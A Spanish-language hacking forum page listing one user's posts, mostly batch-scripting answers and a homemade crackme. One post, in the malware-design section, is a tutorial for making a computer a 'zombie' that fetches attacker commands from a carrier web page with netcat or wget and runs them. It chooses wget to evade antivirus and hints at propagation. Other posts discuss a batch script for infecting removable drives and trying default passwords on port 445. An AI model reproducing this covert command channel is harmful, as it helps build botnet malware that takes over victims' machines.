elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: 1 2 [3] 4
21  Programación / Scripting / Re: Comando/opción MS-DOS insertar linea en archivo .txt en: 8 Abril 2010, 21:45 pm
Mu facil creas un archivo nuevo con la cabecera que tu quieras y despues añades el contenido del archivo anterior y luego pegas el cambiazo ^^

Código
  1. echo "cabecera" > ArchivoNuevo.txt
  2. for /f "tokens=*" %%a in ('type mifichero.txt') do ( call :uno %%a)
  3. del /f /q mifichero.txt
  4. rename ArchivoNuevo.txt mifichero.txt
  5. :uno
  6. set pam = %*
  7. echo %pam% >> ArchivoNuevo.txt
  8. goto :EOF
  9.  

22  Seguridad Informática / Hacking / Re: windows XP 445 en: 2 Abril 2010, 16:25 pm
Puedes probar passwords que se instalan por defecto pero de sesiones nulas ni hablar
23  Seguridad Informática / Análisis y Diseño de Malware / Subyugar un pc con archivos por lotes en: 18 Marzo 2010, 14:29 pm
Bueno me e animado a subir este pequeño manual para volver "zombi" cualquier ordenado y que ejecute nuestras ordenes lo que denominare (ya que no se su denominacion tecnica) una conexion indirecta ya que nosotros dejaremos la orden en un sitio y el zombi la recogera y ejecutara, aviso que todo lo hago con batch + wget , inicialmente lo codifique utilizando netcat pero para llamar menos la atencion de los AV lo recodifique con wget


Bueno basicamente es aprovechar cualquier campo fijo (pero actualizable) para poner nuestro comando, para poder aislar la linea que contiene nuestro comando deberemos añadir una cadena singular usease una cadena unica que no se repita en el codigo fuente de la pagina a la que llamaremos

Explicare la manera de hacerlo con Netcat tmb para quede completo XD!!

Si utilizamos netcat deveremos guardar la URL en una variable <<EXCLUIENDO los caracteres ( & ) importante!! >>

Si la URL seleccionada tuviera dichos caracteres separariamos la URL en diferentes variables



Código:
http://webPortadora/campo/archivo.html


Esta URL se podria directamente en una variable



Código
  1. set "URL=http://webPortadora/campo/archivo.html"


Esta otra URL habria que separarla

Código:

Código:
http://webPortadora/index.php?id=1&u=10&z=3


Dejandola en tres variables

Código:

Código
  1. set "url1=http://webPortadora/index.php?id=1"
  2. set "url2=u=10"
  3. set "url3=z=3"


Una vez tenemos la url dentro de una variable realizamos la peticion de la pag y aislamos la linea que nos interesa utilizando la cadena singular, recordais ... Cheesy



Código
  1. echo GET %URL%| nc -vn IP(webportadora) 80 | find "CadenaSingular"
  2. o
  3. echo GET "%url1%&%url2%&%url3%" | nc -vn IP(webportadora) 80 | find "CadenaSingular"


Por precaucion contra lammers dire que este code deberia encerrarse dentro de un FOR /F  para poder meter el resultado de la salida del COMANDO en una variable

Como la linea de la pagina a la que llamamos aparte de nuestro codigo tmb tiene su propio codigo html tendremos que recortarle los extremos a la variable tal que asi

Código:

 
Código
  1. set resultado=%resultado:~X,-Y%



Donde (X) seria el cacho que quitamos al principio y (-Y) seria el cacho que le comeremos al final una vez que tenemos el comando en una variable ejecutarlo es una cosa trivial

Con WGET la cosa es casi iwal con la excepcion de que wget guarda el resultado en un archivo el cual llamamos con un FOR /F y guardamos el resultado de la salida en la variable, la recortamos y ya tenemos el comando
nuevamente listo para que lo ejecutemos.


Imaginad con un buen metodo de propagacion .......


Espero os haya servido de algo :)

Un saludo  ;D


24  Programación / Scripting / Re: abrir un JPG desde HTML con un programa en: 17 Marzo 2010, 23:53 pm
No seria mejor combinar wmic con vol para saber aparte de que unidades estan disponibles que unidades estan operativas

Código
  1. @echo off
  2. for /f "tokens=* skip=1" %%a in ('wmic logicaldisk get caption') do (call :uno %%a) &
  3.  
  4. :uno
  5. vol %1 | find "volumen" >nul: 2>&1 && echo Unidad %1 disponible y activa
  6. goto :eof
  7.  

jejejeje es por darle una vuelta mas a la cosa ^^
25  Programación / Scripting / Crackme mejorado en: 26 Octubre 2009, 22:35 pm
Bueno si a alguien le interesan los crackmes aqui os dejo uno haber si conseguis sacar el pass


Código:
@echo off
:cero
@set /p pass=Clave:
@set /a conv=0x%pass:~0,2% * 0x%pass:~2,2%
@set convd=%pass:~4,3%
@set  /a convt= 0x%pass:~7,2%
@set /a convtu= 0x%pass:~9,2%
@set /a convtd= 0x%pass:~11,2%
@set convt=%convt%%convtu%%convtd%
@set cont=0
for /l %%a in (%conv%,%convd%,%convt%) do (call :uno %%a)
@set P=%pass:~0,1%%pass:~-1%
@set /a R=%cont% + 0x%pass:~7,2% + %pass:~2,1%+

0x0%pass:~0,1% >null
@set /a F= %P%*%R%
@set G=%convt:~-4%
if %F% NEQ %G% (echo Error!) else (echo correcto!  XD!!)

:uno
@set U=%*
@set /a cont =%cont%+1
if %cont% EQU 2 (call :dos %U% & goto :EOF) else (
goto :EOF
)

:dos
@set /a S=%U:~0,2% - 0002
goto :EOF



Un saludo gente
26  Programación / Scripting / Crackme by LauBuru en: 29 Septiembre 2009, 01:55 am
Bueno e codeado mi primer crackme, los expertos os descojonareis de lo facil que es pero sed comprensivos que es el primero XD!!

Resultado por MP Animaos!!

Un saludoo   

http://rapidshare.com/files/286200858/LauBuru.rar.htm
27  Programación / Scripting / Re: ¿El mejor lenguaje script? en: 12 Abril 2009, 16:58 pm
Yo ahora estoy en fase de aprendizage, e ojeado muchos libros de diferentes lenguajes y hay algo que se afirma en todos ellos.

Siempre se elige el lenguaje mas apropiado para los requerimientos del programa.

Si se necesita velocidad de ejecucion pos C o ASM o los dos

Si se precisa seguridad JAVA

etc
etc

No hay ningun lenguaje mejor o peor, solo hay lenguajes mas apropiados que otros para lo que se quiere hacer

Claro que con todos se puede hacer casi lo mismo pero algunos tendran mas rendimiento que otros y en otras cosas los otros seran mas eficientes que los unos

Lo mejor, saberlos todos XD!!!


Un saludo    ;D
28  Programación / Scripting / Re: Como cierro un programa abierto desde una carpeta especifica? en: 31 Marzo 2009, 21:47 pm
yo renombraria, uno de los ejecutables para poder operar en ellos individualmente, o tiene importancia el nombre del ejecutable?

Un saludo    ;D
29  Programación / Scripting / Re: Script batch para infeccion a traves de Unidades Extraibles en: 30 Marzo 2009, 22:08 pm
Veo que teneis el culo pelao ya en batch, bien bien asi aprendere mas, por cierto smart una pregunta los tokens de for no van de la A a la Z solamente "^" se admitiria y si asi fuera nos habilitaria el poder usar un tokens mas "^ + A-Z" pregunto pk me has dejao mosca  XD


Un saludo makinas   ;D


PD: Para pedir el tipo de unidades, lo puede hacer un user sin pribilegios de administracion (reg query lo puede usar un user normal?)
30  Programación / Scripting / Re: Script batch para infeccion a traves de Unidades Extraibles en: 30 Marzo 2009, 08:32 am
Ya se que la unidad Ñ no existe pero bueno pues todas las letras porsiaca, antes probe con "fsutil fsinfo drivetype" y "wmic logicaldisk get caption", y para mi este es el metodo mas sencillo, haunque no el mas eficaz pero bueno, poco a poco jejejeje

Un saludo   :)

PD:Modifique el code para evitar esos errores,  ;D
Páginas: 1 2 [3] 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines